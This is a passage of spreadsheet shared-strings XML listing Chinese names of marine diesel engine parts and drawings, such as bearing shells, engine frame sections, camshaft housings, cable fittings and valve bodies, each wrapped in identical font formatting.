        <charset val="134"/>
      </rPr>
      <t>十字头轴承盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承塞尺</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴轴承箱体焊接图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供油单元壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承合金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承付</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴瓦运行层</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承承磨层</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴瓦</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄销轴瓦</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄销轴承上轴瓦</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄销轴承下轴瓦</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄销轴瓦上半部分</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头轴瓦</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座校中</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座排放管路</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座基准孔</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座起吊装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座加工</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座排油</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座（输出端机）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座（自由端）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座（中段）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座（加工）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座（焊接）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>皮带</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆锥齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盲法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铭牌</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管坯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油凸轮毛坯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方形盲法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盲铆钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铆接螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模块原理图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机性能曲线</t>
    </r>
  </si>
  <si>
    <r>
      <t>BOA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向膨胀节</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止回阀壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止回阀体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓连接</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>组合垫圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进气口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>升压蓄能器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带箱量缸表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>镗孔图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度试验旋塞焊接座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气瓶固定带</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>波登管式压力表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>箱体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盒装成套扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动元件箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插座盒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>套筒扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转换伐架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防爆门盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>继电器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缓冲器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>花纹板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防爆门圆盘</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>两半式衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>两段式套筒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口垫</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蜂鸣器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旁通管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旁通伐</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆套管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆槽</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆夹</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆扎带</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆槽支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆填料函</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缆线列表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆保护环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆护管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆保护管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆插座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮滚子</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挡块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴箱体形位公差</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴箱体（中段）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴箱体（背面）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴箱体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴箱体（主视图）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴箱体（俯视图）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴润滑油系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴润滑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防护帽</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>封盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>万向轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发运</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>承重螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>左前端罩壳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>右前端罩壳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下罩壳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>罩壳板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油泵壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上罩壳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸造缸体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸造规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>槽形螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开槽螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>警告牌</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间墙</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中央冷却水系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重心</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对中装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中心块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定位销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对中套筒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定心螺柱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
